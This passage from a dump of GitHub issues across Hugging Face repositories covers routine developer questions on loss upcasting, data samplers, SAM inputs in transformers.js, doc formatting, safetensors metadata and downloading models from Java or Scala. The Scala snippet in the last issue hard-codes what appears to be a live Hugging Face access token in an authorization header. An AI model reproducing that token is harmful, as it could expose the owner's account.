\"MonsterMMORPG/Kohya_Train\"\n \n # Use provided target dir or default to current working directory\n download_dir = target_dir if target_dir else os.getcwd()\n \n # Create target directory if it doesn't exist\n os.makedirs(download_dir, exist_ok=True)\n \n try:\n snapshot_download(\n local_dir=download_dir,\n repo_id=repo_id\n )\n print(f\"\\nDOWNLOAD COMPLETED to: {download_dir}\")\n print(\"Check folder content for downloaded files\")\n \n except Exception as e:\n print(f\"Error occurred during download: {str(e)}\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Download models from HuggingFace hub')\n parser.add_argument('--dir', type=str, help='Target directory for downloads', default=None)\n \n args = parser.parse_args()\n download_models(args.dir)\n```", "url": "https://github.com/huggingface/xet-core/issues/358", "state": "closed", "labels": [ "enhancement" ], "created_at": "2025-05-28T22:30:19Z", "updated_at": "2025-11-20T17:08:35Z", "user": "FurkanGozukara" }, { "repo": "huggingface/transformers", "number": 38452, "title": "Memory saving by upcasting logits for only non-ignored positions", "body": "### Feature request\n\nIn [`loss_utils.py`](https://github.com/huggingface/transformers/blob/main/src/transformers/loss/loss_utils.py), logits are upcasted for float32 for some losses. This can waste memory for cases where certain labels are `ignore_index`. This is especially true for fine tuning cases where one chooses to calculate loss only on the completion. They would keep label as -100 for prompt tokens and upcasting those logits would be unnecessary. We can instead call `logits.float()` after we have our final labels. This would be especially useful for `ForCausalLMLoss` as that seems to be the most likely use case.\n\n### Motivation\n\nWhen fine tuning a causal LM, one can choose to calculate loss only on the completion, thus setting labels for prompt tokens to be -100. Upcasting logits at those positions when calculating loss is not needed. Avoiding that can save memory. Most likely use case is `ForCausalLMLoss`.\n\n### Your contribution\n\nAn example for `ForCausalLMLoss`:\n\n```\ndef ForCausalLMLoss(\n logits,\n labels,\n vocab_size: int,\n num_items_in_batch: Optional[int] = None,\n ignore_index: int = -100,\n shift_labels: Optional[torch.Tensor] = None,\n **kwargs,\n) -> torch.Tensor:\n # Don't upcast yet\n # logits = logits.float()\n\n if shift_labels is None:\n # Shift so that tokens < n predict n\n labels = nn.functional.pad(labels, (0, 1), value=ignore_index)\n shift_labels = labels[..., 1:].contiguous() \n\n # Flatten the tokens\n logits = logits.view(-1, vocab_size)\n shift_labels = shift_labels.view(-1)\n\n # Upcast to float if we need to compute the loss to avoid potential precision issues\n # Now that we have our final labels, take only the useful logits and then upcast\n logits = logits[shift_labels != ignore_index]\n shift_labels = shift_labels[shift_labels != ignore_index]\n logits = logits.float()\n\n # Enable model parallelism\n shift_labels = shift_labels.to(logits.device)\n\n # Calculate loss on truncated logits and labels\n loss = fixed_cross_entropy(logits, shift_labels, num_items_in_batch, ignore_index, **kwargs)\n return loss\n```\n\nWe can do something similar in `ForMaskedLMLoss` on line 83 instead of 77. `ForTokenClassification` does not take `ignore_index` as an argument but we can still do the same here because `fixed_cross_entropy` does take `ignore_index`.\n\nAnother alternative was to move the upcasting to inside `fixed_cross_entropy` but a few losses don't do that. So, that might change/break existing things.\n\nLet me know if this change sounds good. I can submit a PR.", "url": "https://github.com/huggingface/transformers/issues/38452", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-05-28T18:58:52Z", "updated_at": "2025-05-29T12:38:15Z", "comments": 1, "user": "harshit2997" }, { "repo": "huggingface/speech-to-speech", "number": 163, "title": "how to use this with Livekit Agent?", "body": "how to use this with Livekit Agent?", "url": "https://github.com/huggingface/speech-to-speech/issues/163", "state": "open", "labels": [], "created_at": "2025-05-28T18:27:11Z", "updated_at": "2025-05-28T18:27:11Z", "user": "Arslan-Mehmood1" }, { "repo": "huggingface/transformers", "number": 38448, "title": "num_items_in_batch larger than the actual useful token when computing loss", "body": "def fixed_cross_entropy(source, target, num_items_in_batch: int = None, ignore_index: int = -100, **kwargs):\nI check the shape of the inputs and find follows:\nIn [1]: logits.shape\nOut[1]: torch.Size([4, 896, 152064])\n\nIn [2]: labels.shape\nOut[2]: torch.Size([4, 896])\n\nIn [3]: num_items_in_batch\nOut[3]: 4390\n\nWhy is 4390>4*896?", "url": "https://github.com/huggingface/transformers/issues/38448", "state": "closed", "labels": [], "created_at": "2025-05-28T15:28:05Z", "updated_at": "2025-05-31T02:30:07Z", "comments": 4, "user": "SHIFTTTTTTTT" }, { "repo": "huggingface/transformers", "number": 38435, "title": "[i18n-ro] Translating docs to Romanian", "body": "Hi!\n\nLet's bring the documentation to all the Romanian-speaking community \ud83c\udf10 \n\nWho would want to translate? Please follow the \ud83e\udd17 [TRANSLATING guide](https://github.com/huggingface/transformers/blob/main/docs/TRANSLATING.md). Here is a list of the files ready for translation. Let us know in this issue if you'd like to translate any, and we'll add your name to the list.\n\nSome notes:\n\n* Please translate using an informal tone (imagine you are talking with a friend about transformers \ud83e\udd17).\n* Please translate in a gender-neutral way.\n* Add your translations to the folder called `` inside the [source folder](https://github.com/huggingface/transformers/tree/main/docs/source).\n* Register your translation in `/_toctree.yml`; please follow the order of the [English version](https://github.com/huggingface/transformers/blob/main/docs/source/en/_toctree.yml).\n* Once you're finished, open a pull request and tag this issue by including #issue-number in the description, where issue-number is the number of this issue. Please ping @stevhliu for review.\n* \ud83d\ude4b If you'd like others to help you with the translation, you can also post in the \ud83e\udd17 [forums](https://discuss.huggingface.co/).\n\n## Get Started section\n\n- [ ] [index.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/index.md) (in progress, [see](https://github.com/zero-point/transformers/tree/add_ro_translation_to_readme))\n- [ ] [quicktour.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/quicktour.md) \n- [ ] [installation.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/installation.md).\n\n## Tutorial section\n- [ ] [pipeline_tutorial.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/pipeline_tutorial.md)\n- [ ] [autoclass_tutorial.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/autoclass_tutorial.md)\n- [ ] [preprocessing.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/preprocessing.md)\n- [ ] [training.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/training.md)\n- [ ] [accelerate.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/accelerate.md)\n- [ ] [model_sharing.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/model_sharing.md)\n- [ ] [multilingual.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/multilingual.md)\n\n\n", "url": "https://github.com/huggingface/transformers/issues/38435", "state": "open", "labels": [ "WIP" ], "created_at": "2025-05-28T12:01:48Z", "updated_at": "2025-05-28T15:53:39Z", "comments": 2, "user": "zero-point" }, { "repo": "huggingface/transformers", "number": 38428, "title": "[Question] The logic of data sampler in data parallel.", "body": "Hi, thanks for your attention.\n\nWhen reading the source code of transformers, I cannot understand the implementation of `_get_train_sampler` in `trainer.py`. Why the default data sampler is `RandomSampler` rather than `DistributedSampler`? How does the trainer handle the sampler for data parallel?\n\nreference code: https://github.com/huggingface/transformers/blob/main/src/transformers/trainer.py#L975", "url": "https://github.com/huggingface/transformers/issues/38428", "state": "closed", "labels": [], "created_at": "2025-05-28T08:49:13Z", "updated_at": "2025-07-06T08:02:36Z", "comments": 3, "user": "kxzxvbk" }, { "repo": "huggingface/transformers", "number": 38425, "title": "Can not load TencentBAC/Conan-embedding-v2", "body": "### System Info\n\nDescription\nWhen attempting to load the \u201cConan-embedding-v2\u201d model directly via transformers.AutoModel.from_pretrained, I get a ValueError indicating that the repo\u2019s config.json lacks a model_type key. This prevents the Transformers library from inferring which model class to instantiate.\n\n\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nfrom transformers import AutoModel\n\nmodel = AutoModel.from_pretrained(\"TencentBAC/Conan-embedding-v2\")\n\nValueError: Unrecognized model in TencentBAC/Conan-embedding-v2.\nShould have a `model_type` key in its config.json, or contain one of the following strings in its name: albert, bart, bert, \u2026, whisper, xlnet, \u2026\n\n\n### Expected behavior\n\nAutoModel.from_pretrained(\"TencentBAC/Conan-embedding-v2\") should load the model automatically, or at minimum provide guidance on how to set the correct model_type.", "url": "https://github.com/huggingface/transformers/issues/38425", "state": "closed", "labels": [ "bug" ], "created_at": "2025-05-28T08:21:23Z", "updated_at": "2025-05-28T14:58:03Z", "comments": 1, "user": "shanekao-sks" }, { "repo": "huggingface/accelerate", "number": 3596, "title": "How to distribute the model into multiple GPUs using accelerate?", "body": "I have 4 GPUs. If I only use a single GPU to train the model, there will be an OutOfMemoryError raised. How can I distribute the model into all the 4 GPUs to avoid the OutOfMemoryError using accelerate?", "url": "https://github.com/huggingface/accelerate/issues/3596", "state": "closed", "labels": [], "created_at": "2025-05-28T06:27:08Z", "updated_at": "2025-05-28T14:06:18Z", "user": "GeorgeCarpenter" }, { "repo": "huggingface/candle", "number": 2971, "title": "Enhance the usability of the tensor struct", "body": "Hello,\n\nI\u2019m currently learning how to use Candle with the book Dive into Deep Learning, but implementing the code in Candle. I noticed that Candle is missing some practical utility functions, such as:\n\n* The Frobenius norm \n* dot product (vector or matrix dot product)\n* matrix-vector multiplication\n\nWhile these functions aren\u2019t overly complex to implement manually, having them natively supported by the Tensor struct would significantly improve usability.\n\nI\u2019ve tried adding some of these functions myself to extend Candle\u2019s functionality (to make it more user-friendly). ", "url": "https://github.com/huggingface/candle/issues/2971", "state": "closed", "labels": [], "created_at": "2025-05-28T03:41:44Z", "updated_at": "2025-05-29T07:41:02Z", "comments": 1, "user": "ssfdust" }, { "repo": "huggingface/transformers.js", "number": 1323, "title": "Cannot get the SAM model running like in example", "body": "### Question\n\nI've found that transformers.js supports SAM as written in 2.14.0 release notes.\nhttps://github.com/huggingface/transformers.js/releases/tag/2.14.0\n\nI'm running the code on a M1 mac in a Brave browser.\n\nBut after I've used and adapted the example script, I can actually see in my browser console that the model is loaded and the browser is working.\n\n\"Image\"\n\nBut then suddenly it crashes with following error:\n\n```\ntransformers.js:11821 Uncaught Error: An error occurred during model execution: \"Missing the following inputs: input_points, input_labels.\n```\n\n**My adapted code looks like this:**\n\n````javascript\n\n// using version 3.5.1\nimport {AutoProcessor, RawImage, SamModel} from \"./node_modules/@huggingface/transformers/dist/transformers.js\";\n\nconst model = await SamModel.from_pretrained('Xenova/slimsam-77-uniform');\nconst processor = await AutoProcessor.from_pretrained('Xenova/slimsam-77-uniform');\n\nconst img_url = 'https://huggingface.co/datasets/Xenova/transformers.js-docs/resolve/main/corgi.jpg';\nconst raw_image = await RawImage.read(img_url);\nconst input_points = [[[340, 250]]] // 2D localization of a window\n\nconst inputs = await processor(raw_image, input_points);\nconst outputs = await model(inputs); /// Error happens here\n\nconst masks = await processor.post_process_masks(outputs.pred_masks, inputs.original_sizes, inputs.reshaped_input_sizes);\nconsole.log(masks); \n// [\n// Tensor {\n// dims: [ 1, 3, 410, 614 ],\n// type: 'bool',\n// data: Uint8Array(755220) [ ... ],\n// size: 755220\n// }\n// ]\nconst scores = outputs.iou_scores;\nconsole.log(scores);\n// Tensor {\n// dims: [ 1, 1, 3 ],\n// type: 'float32',\n// data: Float32Array(3) [\n// 0.8350210189819336,\n// 0.9786665439605713,\n// 0.8379436731338501\n// ],\n// size: 3\n// }\n````\n\n\nMarkup:\n````html\n\n\n \n \n \n\n \n

SAM DEMO

\n \n
\n    \n\n````\n\n\nCan you maybe give me a hint what's the issue here or what I must e.g. change according to major version changes.\n\n\nThanks so much :-)",
    "url": "https://github.com/huggingface/transformers.js/issues/1323",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-27T20:01:49Z",
    "updated_at": "2025-11-29T12:32:29Z",
    "user": "BernhardBehrendt"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1836,
    "title": "Search feature tasks",
    "body": "We implemented a first version of the search chat feature in  #1823, there's still some todos if people feel like tackling: \n\n- [ ] Right now we only return the N most relevant snippets, we would need to return all matching conversations and implement infinite loading & pagination. The building blocks already exist in `NavMenu.svelte` they need to be ported over.\n- [ ] - It would be nice to show, below the conversation title, a little sample of text which matches the search query, so we can see why it matched, right now we only show the title.",
    "url": "https://github.com/huggingface/chat-ui/issues/1836",
    "state": "closed",
    "labels": [
      "enhancement",
      "help wanted",
      "front",
      "back"
    ],
    "created_at": "2025-05-27T08:17:44Z",
    "updated_at": "2025-06-02T14:30:40Z",
    "comments": 7,
    "user": "nsarrazin"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38396,
    "title": "Can I disable all CI works in my forked version of Transformers?",
    "body": "After I synced the `main` branch of Transformers in my forked version, github keeps running CI works and fails. Can I disable it? Thanks.",
    "url": "https://github.com/huggingface/transformers/issues/38396",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-27T04:44:07Z",
    "updated_at": "2025-05-28T18:06:31Z",
    "comments": 2,
    "user": "ChengLyu"
  },
  {
    "repo": "huggingface/doc-builder",
    "number": 564,
    "title": "How to ignore some line when applying style?",
    "body": "I have this in my code:\n\n```python\nexpected_output = textwrap.dedent(\"\"\"\\\n\u256d\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 Step 42 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\n\u2502 \u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513 \u2502\n\u2502 \u2503 Prompt     \u2503 Completion   \u2503 Correctness \u2503 Format \u2503 \u2502\n\u2502 \u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529 \u2502\n\u2502 \u2502 The sky is \u2502  blue.       \u2502        0.12 \u2502   0.79 \u2502 \u2502\n\u2502 \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524 \u2502\n\u2502 \u2502 The sun is \u2502  in the sky. \u2502        0.46 \u2502   0.10 \u2502 \u2502\n\u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502\n\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f\n\"\"\")\n```\n\nAnd it gets reformatted into this:\n\n```python\nexpected_output = textwrap.dedent(\"\"\"\\\n\u256d\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 Step 42 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e \u2502 \u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2502 \u2502 \u2503 Prompt \u2503 Completion \u2503 Correctness \u2503 Format \u2503 \u2502 \u2502 \u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529 \u2502 \u2502\n\u2502 The sky is \u2502 blue. \u2502 0.12 \u2502 0.79 \u2502 \u2502 \u2502 \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524 \u2502 \u2502 \u2502 The sun is\n\u2502 in the sky. \u2502 0.46 \u2502 0.10 \u2502 \u2502 \u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502\n\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f\n\"\"\")\n```\n\nis there a way to avoid this?",
    "url": "https://github.com/huggingface/doc-builder/issues/564",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-26T21:58:08Z",
    "updated_at": "2025-05-26T21:59:13Z",
    "user": "qgallouedec"
  },
  {
    "repo": "huggingface/safetensors",
    "number": 609,
    "title": "Properties data",
    "body": "### Feature request\n\nPlease add properties for the content of safetensor files.\n(Which can be read without the requirement to load the whole thing ...)\n\n### Motivation\n\nRename all your safetensor files to a numeric value from 1.safetensors to n.safetensors, where n is the amount of such files you have.\n\nNow try to find out, what is inside, like:\n- Model type (checkpoint, lora, ip-adapter-files, anything else)\n- Application type (SD1, SD2, SD3, SDXL, FLUX, Audio, Video and more)\n- Original name\n- Version\n- and more ...\n\nThe safetensor file is like a package without any description. There's something inside, but you don't have any possibility to see what it is.\n\nWhat users are missing is the package label that tells them, what's inside, like anything in the warehouse. If you go shopping, such a label tells you the name, the producers name, the weight and normally something about the ingredients.\n\nIt would be very useful, if a safetensor package could do this too.\n\n### Your contribution\n\nI just have the idea.\nI don't know how to PR  ...",
    "url": "https://github.com/huggingface/safetensors/issues/609",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-26T20:06:13Z",
    "updated_at": "2025-06-16T12:13:08Z",
    "comments": 2,
    "user": "schoenid"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 660,
    "title": "How to control the number of responses per query for each benchmark?",
    "body": "Hi, thank you for the great work!\nIn the README, I noticed that you mention the use of different numbers of responses per query for estimating pass@1 across benchmarks. For example:\n\nBenchmark | Number of responses per query\n-- | --\nAIME 2024 | 64\nMATH-500 | 4\nGPQA Diamond | 8\nLiveCodeBench | 16\n\nHowever, I'm unable to find where in the code or CLI these values are configured. When running the following example:\n\n```\nNUM_GPUS=1\nMODEL=deepseek-ai/{model_name}\nMODEL_ARGS=\"model_name=$MODEL,dtype=bfloat16,max_model_length=32768,gpu_memory_utilization=0.8,data_parallel_size=$NUM_GPUS,generation_parameters={max_new_tokens:32768,temperature:0.6,top_p:0.95}\"\nOUTPUT_DIR=data/evals/$MODEL\n\nlighteval vllm $MODEL_ARGS \"lighteval|aime24|0|0\" \\\n    --use-chat-template \\\n    --output-dir $OUTPUT_DIR\n```\n\nDoes this automatically sample 64 responses per query for AIME24, as indicated in the table? Or do I need to explicitly specify the number of responses? If so, how can I pass that parameter through the CLI?",
    "url": "https://github.com/huggingface/open-r1/issues/660",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-26T14:38:15Z",
    "updated_at": "2025-05-27T15:32:50Z",
    "user": "Zoeyyao27"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38377,
    "title": "Why are the model classes in unit tests imported directly from the transformer package instead of directly importing the model classes in the file? Is there any special consideration?",
    "body": "### Feature request\n\nTake qwen3MoE unit test as an example:\nif is_torch_available():\n    import torch\n\n    from transformers import (\n        Qwen3MoeForCausalLM,\n        Qwen3MoeForQuestionAnswering,\n        Qwen3MoeForSequenceClassification,\n        Qwen3MoeForTokenClassification,\n        Qwen3MoeModel,\n    )\n\nWhy not this:\nfrom src.transformers.models.qwen3_moe.modeling_qwen3_moe import (\n        Qwen3MoeForCausalLM,\n        Qwen3MoeForQuestionAnswering,\n        Qwen3MoeForSequenceClassification,\n        Qwen3MoeForTokenClassification,\n        Qwen3MoeModel,\n        )\n\n### Motivation\n\nUnit tests should guard their own code files\n\n### Your contribution\n\nNo PR has been submitted yet",
    "url": "https://github.com/huggingface/transformers/issues/38377",
    "state": "open",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-05-26T11:41:19Z",
    "updated_at": "2025-05-26T11:41:19Z",
    "comments": 0,
    "user": "ENg-122"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38375,
    "title": "Unable to run run_instance_segmentation_no_trainer with HF Accelerate",
    "body": "### System Info\n\nI am trying to run the [examples/pytorch/instance-segmentation/run_instance_segmentation_no_trainer.py](https://github.com/huggingface/transformers/blob/d1b92369ca193da49f9f7ecd01b08ece45c2c9aa/examples/pytorch/instance-segmentation/run_instance_segmentation_no_trainer.py) with HF Accelerate. I was able to run the other Trainer API example successfully, but the No Trainer (Accelerate) version is facing the following bug.\n\nThis is using the `4.52.0.dev0` instance. The only change I've made was to change epochs=2. \n\nThe following error arose, when trying to prompt for more information, ChatGPT suggests it could be the following issues but I have no idea on what could be the root cause. No other related issues found and the docs bot was not working. Would appreciate advice on how to run this example script as I hope to adopt it for my task.\n\n| **Category**                | **Potential Issue**                                                                 | **Explanation**                                                                                             | **Recommended Fix**                                                                                   |\n|----------------------------|--------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------|\n| **Model Config Mismatch**  | Mismatch in `num_labels` vs checkpoint (81 vs 3)                                     | Causes some layers (e.g., `class_predictor`) to be randomly initialized, might desync ranks                 | Set `config.num_labels = 3` **before** loading the model or use a matching checkpoint                 |\n| **DDP Desynchronization**  | Different logic across ranks (e.g., `if rank == 0:` doing extra things)             | All ranks must call collectives in the same order and time                                                  | Ensure logic is **identical** across all ranks                                                         |\n| **Evaluation in DDP**      | Evaluation logic not synchronized                                                   | Can cause hanging during collective ops like `all_gather`                                                   | Skip evaluation for non-zero ranks or use `if rank == 0:` carefully                                   |\n| **GPU Communication**      | NCCL timeout or deadlock due to driver/hardware/GIL issues                          | Long-running or stuck collectives cause watchdog termination                                                | Set env vars: `NCCL_BLOCKING_WAIT=1`, `NCCL_ASYNC_ERROR_HANDLING=1`, and reduce batch size if needed  |\n| **Distributed Setup**      | Improper `accelerate` or `torchrun` configuration                                   | One process might be behaving incorrectly                                                                   | Test with single GPU first: `CUDA_VISIBLE_DEVICES=0 accelerate launch --num_processes=1 ...`          |\n| **Deprecated Args**        | `_max_size` passed to `Mask2FormerImageProcessor`                                   | Harmless, but messy                                                                                         | Remove `_max_size` from processor initialization                                                       |\n| **Resource Overload**      | GPU memory, bandwidth, or CPU bottleneck                                            | Can indirectly cause slowdowns or crashes                                                                   | Monitor with `nvidia-smi`, lower batch size, reduce `num_workers`                                     |\n\nError message below:\n```\nloading weights file model.safetensors from cache at /home/jiayi/.cache/huggingface/hub/models--facebook--mask2former-swin-tiny-coco-instance/snapshots/22c4a2f15dc88149b8b8d9f4d42c54431fbd66f6/model.safetensors\nInstantiating SwinBackbone model under default dtype torch.float32.\nAll model checkpoint weights were used when initializing Mask2FormerForUniversalSegmentation.\n\nSome weights of Mask2FormerForUniversalSegmentation were not initialized from the model checkpoint at facebook/mask2former-swin-tiny-coco-instance and are newly initialized because the shapes did not match:\n- class_predictor.bias: found shape torch.Size([81]) in the checkpoint and torch.Size([3]) in the model instantiated\n- class_predictor.weight: found shape torch.Size([81, 256]) in the checkpoint and torch.Size([3, 256]) in the model instantiated\n- criterion.empty_weight: found shape torch.Size([81]) in the checkpoint and torch.Size([3]) in the model instantiated\nYou should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.\n/raid/jiayi/safety_barrier_breach/mask2former_hf/venv/lib/python",
    "url": "https://github.com/huggingface/transformers/issues/38375",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-26T10:23:04Z",
    "updated_at": "2025-07-05T08:03:07Z",
    "comments": 3,
    "user": "gohjiayi"
  },
  {
    "repo": "huggingface/huggingface_hub",
    "number": 3117,
    "title": "how to download huggingface model files  organize the http header  and  so on  in other language",
    "body": "Hi, \n          I  want to use another language like java or scala to download  huggging face  model and config.json. but  meet connnect error , it is  not make sense . so  I  want to know does huggingface  have some more  setting to download file ?\n\n````\n\npackage torch.tr\n\nimport java.io.FileOutputStream\nimport java.net.URI\nimport java.net.http.{HttpClient, HttpRequest, HttpResponse}\nimport java.time.Duration\n\nobject HuggingFaceDownloader {\n  def main(args: Array[String]): Unit = {\n    val fileUrl = \"https://huggingface.co/codellama/CodeLlama-7b-Instruct-hf/resolve/main/config.json\"\n    val savePath = \"config.json\"\n\n    val headers = Map(\n      \"Accept-Encoding\" -> \"identity\",\n//      \"user-agent\" -> \"transformers/0.0.1;  java/23.0.2+7-58;  hf_hub/null;  java/23.0.2;  file_type/config;  from_autoclass/false;  session_id/1AC306C59B944E9EA06A482682BE9584; unknown/None\",\n      \"authorization\" -> \"Bearer hf_XXAdogOLotfVSVFMKrWXSITeByDgRe\"\n    )\n\n    try {\n      downloadFile(fileUrl, savePath, headers)\n      println(s\"\u6587\u4ef6\u4e0b\u8f7d\u6210\u529f\uff0c\u4fdd\u5b58\u8def\u5f84: $savePath\")\n    } catch {\n      case e: Exception =>\n        System.err.println(s\"\u6587\u4ef6\u4e0b\u8f7d\u5931\u8d25: ${e.getMessage}\")\n        e.printStackTrace()\n    }\n  }\n\n  def downloadFile(fileUrl: String, savePath: String, headers: Map[String, String]): Unit = {\n    val client = HttpClient.newBuilder()\n      .connectTimeout(Duration.ofSeconds(10))\n      .followRedirects(HttpClient.Redirect.NORMAL)\n      .build()\n\n    val requestBuilder = HttpRequest.newBuilder()\n      .uri(URI.create(fileUrl))\n      .GET()\n\n    headers.foreach { case (key, value) =>\n      requestBuilder.header(key, value)\n    }\n\n    val request = requestBuilder.build()\n\n    val response = client.send(request, HttpResponse.BodyHandlers.ofInputStream())\n\n    if (response.statusCode() == 200) {\n      val inputStream = response.body()\n      val outputStream = new FileOutputStream(savePath)\n      try {\n        val buffer = new Array[Byte](4096)\n        var bytesRead = inputStream.read(buffer)\n        while (bytesRead != -1) {\n          outputStream.write(buffer, 0, bytesRead)\n          bytesRead = inputStream.read(buffer)\n        }\n      } finally {\n        inputStream.close()\n        outputStream.close()\n      }\n    } else {\n      throw new Exception(s\"\u4e0b\u8f7d\u5931\u8d25\uff0c\u72b6\u6001\u7801: ${response.statusCode()}\")\n    }\n  }\n}\n\n```\n\n```\npackage dev.transformers4j.transformers;\n\nimport java.io.BufferedInputStream;\nimport java.io.FileOutputStream;\nimport java.io.IOException;\nimport java.net.URL;\n\npublic class HuggingFaceDownloader2 {\n\n    public static void main(String[] args) {\n        String fileUrl = \"https://huggingface.co/codellama/CodeLlama-7b-Instruct-hf/resolve/main/config.json\";\n        String savePath = \"config.json\"; // \u672c\u5730\u4fdd\u5b58\u7684\u6587\u4ef6\u8def\u5f84\n\n        try {\n            downloadFile(fileUrl, savePath);\n            System.out.println(\"\u6587\u4ef6\u4e0b\u8f7d\u6210\u529f\uff0c\u4fdd\u5b58\u8def\u5f84: \" + savePath);\n        } catch (IOException e) {\n            System.err.println(\"\u6587\u4ef6\u4e0b\u8f7d\u5931\u8d25: \" + e.getMessage());\n            e.printStackTrace();\n        }\n    }\n\n    /**\n     * \u4ece\u6307\u5b9a URL 